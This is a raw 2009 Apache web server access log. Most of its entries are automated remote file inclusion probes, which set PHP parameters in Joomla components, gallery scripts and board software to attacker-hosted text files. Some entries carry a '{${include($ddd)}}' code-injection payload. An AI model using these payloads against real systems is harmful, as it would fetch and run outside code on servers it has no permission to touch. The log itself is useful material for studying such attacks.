67.222.1.40 - - [12/Sep/2009:05:19:33 -0400] "GET /logs/access_log.Q109062200%20%20///?_SERVER[DOCUMENT_ROOT]=http://web.hocome.com//modules/Forums/admin/zfxid1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
212.186.220.246 - - [12/Sep/2009:05:19:43 -0400] "GET /logs/access_log.Q109051800%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
212.186.220.246 - - [12/Sep/2009:05:20:06 -0400] "GET /logs/access_log.Q109071100%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
67.222.1.40 - - [12/Sep/2009:05:20:52 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://web.hocome.com//modules/Forums/admin/zfxid1.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
67.222.1.40 - - [12/Sep/2009:05:20:52 -0400] "GET /logs/access_log.Q109080200%20%20////?_SERVER[DOCUMENT_ROOT]=http://web.hocome.com//modules/Forums/admin/zfxid1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
67.222.1.40 - - [12/Sep/2009:05:20:52 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://web.hocome.com//modules/Forums/admin/zfxid1.txt? HTTP/1.1" 200 17505 "-" "Mozilla/5.0"
67.222.1.40 - - [12/Sep/2009:05:20:58 -0400] "GET /logs/access_log.Q109071000%20%20////?_SERVER[DOCUMENT_ROOT]=http://web.hocome.com//modules/Forums/admin/zfxid1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
58.184.252.3 - - [12/Sep/2009:05:21:12 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://web.hocome.com//modules/Forums/admin/zfxid1.txt? HTTP/1.1" 200 17504 "-" "Mozilla/5.0"
58.184.252.3 - - [12/Sep/2009:05:21:15 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://web.hocome.com//modules/Forums/admin/zfxid1.txt? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.184.252.3 - - [12/Sep/2009:05:21:47 -0400] "GET /logs/access_log.Q109062200%20%20///?_SERVER[DOCUMENT_ROOT]=http://web.hocome.com//modules/Forums/admin/zfxid1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
119.152.82.144 - - [12/Sep/2009:05:21:54 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
119.152.82.144 - - [12/Sep/2009:05:21:54 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
119.152.82.144 - - [12/Sep/2009:05:21:59 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
119.152.82.144 - - [12/Sep/2009:05:21:59 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
74.6.22.167 - - [12/Sep/2009:05:22:18 -0400] "GET /logs/access_log.Q108052700 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
58.184.252.3 - - [12/Sep/2009:05:22:28 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://web.hocome.com//modules/Forums/admin/zfxid1.txt? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.184.252.3 - - [12/Sep/2009:05:22:25 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://web.hocome.com//modules/Forums/admin/zfxid1.txt? HTTP/1.1" 200 17504 "-" "Mozilla/5.0"
58.184.252.3 - - [12/Sep/2009:05:22:30 -0400] "GET /logs/access_log.Q109052400%20%20///?_SERVER[DOCUMENT_ROOT]=http://web.hocome.com//modules/Forums/admin/zfxid1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.184.252.3 - - [12/Sep/2009:05:22:43 -0400] "GET /logs/access_log.Q109062200%20%20///?_SERVER[DOCUMENT_ROOT]=http://web.hocome.com//modules/Forums/admin/zfxid1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
222.122.72.216 - - [12/Sep/2009:05:23:03 -0400] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
222.122.72.216 - - [12/Sep/2009:05:23:03 -0400] "GET /logs/access_log.Q109051800//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
222.122.72.216 - - [12/Sep/2009:05:23:03 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://rox-crime66.no-ip.org:8080/id.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
213.186.117.226 - - [12/Sep/2009:05:23:09 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
213.186.117.226 - - [12/Sep/2009:05:23:09 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
213.186.117.226 - - [12/Sep/2009:05:23:09 -0400] "GET /logs/access_log.Q109051600%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
64.34.169.243 - - [12/Sep/2009:05:23:16 -0400] "GET /logs/access_log.Q109061800/index.php?sayfa=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
64.34.169.243 - - [12/Sep/2009:05:23:17 -0400] "GET /index.php?sayfa=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
64.34.169.243 - - [12/Sep/2009:05:23:17 -0400] "GET /logs/index.php?sayfa=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
209.59.12.99 - - [12/Sep/2009:05:23:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.186.117.226 - - [12/Sep/2009:05:23:30 -0400] "GET /logs/access_log.Q109081300%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
213.186.117.226 - - [12/Sep/2009:05:23:31 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
213.186.117.226 - - [12/Sep/2009:05:23:31 -0400] "GET /logs/access_log.Q109081300%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
213.186.117.226 - - [12/Sep/2009:05:23:31 -0400] "GET /logs/access_log.Q109051600%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
213.186.117.226 - - [12/Sep/2009:05:23:31 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
211.233.69.41 - - [12/Sep/2009:05:23:39 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
211.233.69.41 - - [12/Sep/2009:05:23:39 -0400] "GET /logs/access_log.Q109080200////?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.233.69.41 - - [12/Sep/2009:05:23:39 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 200 17505 "-" "Mozilla/5.0"
211.233.69.41 - - [12/Sep/2009:05:23:55 -0400] "GET /logs/access_log.Q109071000////?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
213.186.117.226 - - [12/Sep/2009:05:24:13 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
213.186.117.226 - - [12/Sep/2009:05:24:13 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
213.186.117.226 - - [12/Sep/2009:05:24:13 -0400] "GET /logs/access_log.Q109051600%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
213.186.117.226 - - [12/Sep/2009:05:24:13 -0400] "GET /logs/access_log.Q109081300%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
89.108.66.115 - - [12/Sep/2009:05:24:44 -0400] "GET /logs/access_log.Q109052500/////?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.812"
89.108.66.115 - - [12/Sep/2009:05:24:46 -0400] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 455 "-" "libwww-perl/5.812"
89.108.66.115 - - [12/Sep/2009:05:24:46 -0400] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 17506 "-" "libwww-perl/5.812"
211.206.123.177 - - [12/Sep/2009:05:25:21 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
211.206.123.177 - - [12/Sep/2009:05:25:21 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.79"
211.206.123.177 - - [12/Sep/2009:05:25:22 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
70.90.108.169 - - [12/Sep/2009:05:25:26 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:05:25:27 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:05:25:27 -0400] "GET /logs/access_log.Q109080600%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
211.233.69.41 - - [12/Sep/2009:05:25:28 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
211.233.69.41 - - [12/Sep/2009:05:25:28 -0400] "GET /logs/access_log.Q109080200////?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.233.69.41 - - [12/Sep/2009:05:25:28 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 200 17505 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:05:25:30 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:05:25:30 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:05:25:30 -0400] "GET /logs/access_log.Q109080600/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
211.233.69.41 - - [12/Sep/2009:05:25:44 -0400] "GET /logs/access_log.Q109071000////?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.184.252.3 - - [12/Sep/2009:05:25:53 -0400] "GET /logs/access_log.Q109052400///?_SERVER[DOCUMENT_ROOT]=http://web.hocome.com//modules/Forums/admin/zfxid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
64.34.169.243 - - [12/Sep/2009:05:25:58 -0400] "GET /logs/error_log.Q109061800/index.php?sayfa=http://h1.ripway.com/kambe2/nyari/safe?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
58.184.252.3 - - [12/Sep/2009:05:25:58 -0400] "GET /logs/access_log.Q109062200///?_SERVER[DOCUMENT_ROOT]=http://web.hocome.com//modules/Forums/admin/zfxid1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
82.146.119.209 - - [12/Sep/2009:05:26:11 -0400] "GET //myPHPCalendar/admin.php?cal_dir=http://phsscience.org/tscfe/fx29id.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
82.146.119.209 - - [12/Sep/2009:05:26:11 -0400] "GET /logs//myPHPCalendar/admin.php?cal_dir=http://phsscience.org/tscfe/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
89.108.66.115 - - [12/Sep/2009:05:26:48 -0400] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 200 455 "-" "libwww-perl/5.812"
89.108.66.115 - - [12/Sep/2009:05:27:02 -0400] "GET /logs/access_log.Q109052000/////?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.812"
222.122.72.216 - - [12/Sep/2009:05:28:02 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://roadone.net/board/skin/outlogin/donid.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
67.222.1.40 - - [12/Sep/2009:05:28:09 -0400] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://web.hocome.com//modules/Forums/admin/zfxid1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
67.222.1.40 - - [12/Sep/2009:05:28:09 -0400] "GET /logs/access_log.Q109053100%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://web.hocome.com//modules/Forums/admin/zfxid1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.222.1.40 - - [12/Sep/2009:05:28:09 -0400] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://web.hocome.com//modules/Forums/admin/zfxid1.txt? HTTP/1.1" 200 17503 "-" "Mozilla/5.0"
67.222.1.40 - - [12/Sep/2009:05:28:13 -0400] "GET /logs/access_log.Q109062100%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://web.hocome.com//modules/Forums/admin/zfxid1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:05:28:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
206.225.23.4 - - [12/Sep/2009:05:28:44 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
206.225.23.4 - - [12/Sep/2009:05:28:44 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
206.225.23.4 - - [12/Sep/2009:05:28:44 -0400] "GET /logs/access_log.Q109070800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
206.225.23.4 - - [12/Sep/2009:05:28:52 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
206.225.23.4 - - [12/Sep/2009:05:28:52 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
206.225.23.4 - - [12/Sep/2009:05:28:52 -0400] "GET /logs/access_log.Q109070800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:05:28:53 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:05:28:53 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:05:28:53 -0400] "GET /logs/access_log.Q109081300%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:05:28:57 -0400] "GET /logs/access_log.Q109081300%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:05:28:57 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:05:28:57 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
206.225.23.4 - - [12/Sep/2009:05:28:57 -0400] "GET /logs/error_log.Q109070800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:05:29:01 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:05:29:01 -0400] "GET /logs/access_log.Q109081300%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:05:29:02 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:05:29:04 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:05:29:04 -0400] "GET /logs/access_log.Q109081300%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:05:29:04 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
206.225.23.4 - - [12/Sep/2009:05:29:05 -0400] "GET /logs/error_log.Q109070800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:05:29:16 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:05:29:16 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:05:29:16 -0400] "GET /logs/access_log.Q109081300%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:05:29:17 -0400] "GET /logs/access_log.Q109051600%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:05:29:18 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:05:29:18 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:05:29:18 -0400] "GET /logs/access_log.Q109081300%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:05:29:26 -0400] "GET /logs/access_log.Q109051600%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:05:29:28 -0400] "GET /logs/access_log.Q109051600%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:05:29:32 -0400] "GET /logs/access_log.Q109051600%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:05:29:40 -0400] "GET /logs/access_log.Q109051600%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
211.115.89.97 - - [12/Sep/2009:05:29:40 -0400] "GET /logs/access_log.Q109051600%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
211.233.69.41 - - [12/Sep/2009:05:30:56 -0400] "GET /logs/access_log.Q109071000%20%20////?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.233.69.41 - - [12/Sep/2009:05:30:56 -0400] "GET /logs/access_log.Q109080200%20%20////?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.233.69.41 - - [12/Sep/2009:05:30:58 -0400] "GET /logs/access_log.Q109071000%20%20////?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
211.233.69.41 - - [12/Sep/2009:05:30:58 -0400] "GET /logs/access_log.Q109080200%20%20////?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Sep/2009:05:31:09 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Sep/2009:05:31:09 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
61.100.5.136 - - [12/Sep/2009:05:31:09 -0400] "GET /logs/access_log.Q109070800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.218.40.180 - - [12/Sep/2009:05:31:36 -0400] "GET /init_basic.php?GALLERY_BASEDIR=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.218.40.180 - - [12/Sep/2009:05:31:36 -0400] "GET /logs/init_basic.php?GALLERY_BASEDIR=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
211.218.40.180 - - [12/Sep/2009:05:31:36 -0400] "GET /logs/access_log.Q109051500/init_basic.php?GALLERY_BASEDIR=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.218.40.180 - - [12/Sep/2009:05:31:45 -0400] "GET /logs/access_log.Q109081000/init_basic.php?GALLERY_BASEDIR=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
58.120.226.113 - - [12/Sep/2009:05:32:02 -0400] "GET /logs/init_basic.php?GALLERY_BASEDIR=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
58.120.226.113 - - [12/Sep/2009:05:32:02 -0400] "GET /logs/access_log.Q109051500/init_basic.php?GALLERY_BASEDIR=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
58.120.226.113 - - [12/Sep/2009:05:32:02 -0400] "GET /init_basic.php?GALLERY_BASEDIR=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
